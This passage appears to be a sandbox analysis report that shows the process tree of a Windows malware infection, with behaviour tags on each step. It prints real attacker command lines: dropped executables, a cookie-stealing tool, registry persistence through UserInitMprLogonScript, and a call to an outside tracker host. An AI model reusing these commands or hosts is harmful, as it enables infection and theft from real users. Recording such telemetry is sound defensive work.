C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y3llzzkr.rk1\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\y3llzzkr.rk1\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\y3llzzkr.rk1\GcleanerEU.exe /eufive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6800 -s 27612⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exeC:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\12bsxfjm.pid\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lu0sqk1i.md0\ufgaa.exe & exit10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exeC:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe"C:\Users\Admin\AppData\Local\Temp\hvtgbd03.og5\anyname.exe" -q12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvhf5rlb.fwu\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\rvhf5rlb.fwu\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rvhf5rlb.fwu\gcleaner.exe /mixfive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 28012⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jo03uqwd.5em\autosubplayer.exe /S & exit10⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8324748.exe"C:\Users\Admin\AppData\Roaming\8324748.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5880 -s 23408⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\6798012.exe"C:\Users\Admin\AppData\Roaming\6798012.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4957603.exe"C:\Users\Admin\AppData\Roaming\4957603.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\8473479.exe"C:\Users\Admin\AppData\Roaming\8473479.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp9432_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp9432_tmp.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks8⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks10⤵
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 3010⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i10⤵
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe36⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\6lBjuoNz0e6Or5kVN9o2FWEh.exe"C:\Users\Admin\Documents\6lBjuoNz0e6Or5kVN9o2FWEh.exe"7⤵
-
C:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exe"C:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exeC:\Users\Admin\Documents\9VfyAu5Y5h33aHpqD2aHew95.exe8⤵
-
C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe"C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe"C:\Users\Admin\Documents\pCuweAs8rFE1CgxW49f5aXKk.exe" -q8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\0bM853sXZJfrnu2mWSAOETVc.exe"C:\Users\Admin\Documents\0bM853sXZJfrnu2mWSAOETVc.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\WchvfjN_dzKFtUxFm7qRXxfF.exe"C:\Users\Admin\Documents\WchvfjN_dzKFtUxFm7qRXxfF.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 3168⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exe"C:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exe"7⤵
-
C:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exeC:\Users\Admin\Documents\rQWlsYju61VFwsMGUM6zDgsi.exe8⤵
-
C:\Users\Admin\Documents\6EAqljiltiWS3f7r6sB61_sQ.exe"C:\Users\Admin\Documents\6EAqljiltiWS3f7r6sB61_sQ.exe"7⤵
-
C:\Users\Admin\Documents\t32Ur7ILpInlYyJRLs12SnLx.exe"C:\Users\Admin\Documents\t32Ur7ILpInlYyJRLs12SnLx.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KFD23.tmp\t32Ur7ILpInlYyJRLs12SnLx.tmp"C:\Users\Admin\AppData\Local\Temp\is-KFD23.tmp\t32Ur7ILpInlYyJRLs12SnLx.tmp" /SL5="$1044E,138429,56832,C:\Users\Admin\Documents\t32Ur7ILpInlYyJRLs12SnLx.exe"8⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-AFU84.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AFU84.tmp\Setup.exe" /Verysilent9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629272556 /qn CAMPAIGN=""710"" " CAMPAIGN="710"11⤵
-
C:\Users\Admin\Documents\asMNUD7Whzsx89sAGP_aLokg.exe"C:\Users\Admin\Documents\asMNUD7Whzsx89sAGP_aLokg.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 2928⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe"C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exeC:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe8⤵
-
C:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exeC:\Users\Admin\Documents\DeHSDgDwlyn6MuTw6HCcYCrn.exe8⤵
-
C:\Users\Admin\Documents\0_7TlO6M5acqX4EPsCCuuuIA.exe"C:\Users\Admin\Documents\0_7TlO6M5acqX4EPsCCuuuIA.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\5999348.exe"C:\Users\Admin\AppData\Roaming\5999348.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5212 -s 22929⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\4116312.exe"C:\Users\Admin\AppData\Roaming\4116312.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Documents\7vrT3uOZl1qmiSYlZrNbnZUH.exe"C:\Users\Admin\Documents\7vrT3uOZl1qmiSYlZrNbnZUH.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\NwFGfQ4gWNhniyDRsfbdyZxN.exe"C:\Users\Admin\Documents\NwFGfQ4gWNhniyDRsfbdyZxN.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ewz7aGhr4LCktqJ0Uq05IHJx.exe"C:\Users\Admin\Documents\ewz7aGhr4LCktqJ0Uq05IHJx.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\PSFJVLwun3TcfKuUSaxkpg3c.exe"C:\Users\Admin\Documents\PSFJVLwun3TcfKuUSaxkpg3c.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\5uJnm0wkHdqW1g5_jI555vTL.exe"C:\Users\Admin\Documents\5uJnm0wkHdqW1g5_jI555vTL.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\oV9K3dhV904F3H994tOBupei.exe"C:\Users\Admin\Documents\oV9K3dhV904F3H994tOBupei.exe"7⤵
-
C:\Users\Admin\Documents\bEQOSwZfLy35v67HMStZes1l.exe"C:\Users\Admin\Documents\bEQOSwZfLy35v67HMStZes1l.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 2728⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\xLqNvme6hoDlPTgBHwIDSLik.exe"C:\Users\Admin\Documents\xLqNvme6hoDlPTgBHwIDSLik.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 2808⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe"C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe"C:\Users\Admin\Documents\n5iK85pyxBdO3WOr6bRNQ6xx.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 9845⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 2763⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 16363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jamesold.exe"C:\Users\Admin\AppData\Local\Temp\jamesold.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv yKasnM7UgUqICmWI3CBItg.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 860 -ip 8601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3792 -ip 37921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2288 -ip 22881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 744 -ip 7441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3636 -ip 36361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3904 -ip 39041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5080 -ip 50801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4844 -ip 48441⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VK655.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-VK655.tmp\Inlog.tmp" /SL5="$302DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-80MOG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-80MOG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7212⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-QSNKH.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QSNKH.tmp\Setup.tmp" /SL5="$50256,17369384,721408,C:\Users\Admin\AppData\Local\Temp\is-80MOG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7213⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\microsoft.cab -F:* %ProgramData%4⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-GQ7IO.tmp\{app}\microsoft.cab -F:* C:\ProgramData5⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f5⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7214⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=7215⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x120,0x124,0x128,0x11c,0xd4,0x7ffb4adc46f8,0x7ffb4adc4708,0x7ffb4adc47186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:36⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,13846699086861451735,12211063793277139040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:86⤵
-
